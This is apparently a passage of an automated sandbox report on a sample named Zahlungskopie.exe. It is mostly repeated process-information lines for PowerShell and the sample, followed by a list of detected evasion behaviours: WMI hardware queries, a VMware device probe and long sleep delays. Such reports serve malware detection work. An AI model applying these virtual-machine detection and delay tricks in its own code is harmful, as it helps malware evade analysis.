              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              barindex
              Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
              Source: C:\Users\user\Desktop\Zahlungskopie.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
              Source: C:\Users\user\Desktop\Zahlungskopie.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3689Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3016Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3568Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3196Jump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeWindow / User API: threadDelayed 1911
              Source: C:\Users\user\Desktop\Zahlungskopie.exeWindow / User API: threadDelayed 7912
              Source: C:\Users\user\Desktop\Zahlungskopie.exe TID: 5108Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exe TID: 4292Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exe TID: 2204Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3120Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3788Thread sleep time: -18446744073709540s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exe TID: 5628Thread sleep time: -25825441703193356s >= -30000s
              Source: C:\Users\user\Desktop\Zahlungskopie.exe TID: 5684Thread sleep count: 1911 > 30
              Source: C:\Users\user\Desktop\Zahlungskopie.exe TID: 5684Thread sleep count: 7912 > 30
              Source: C:\Users\user\Desktop\Zahlungskopie.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: powershell.exe, 0000000B.00000003.811490211.000000000553D000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000003.856988920.0000000004CCA000.00000004.00000001.sdmpBinary or memory string: k:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
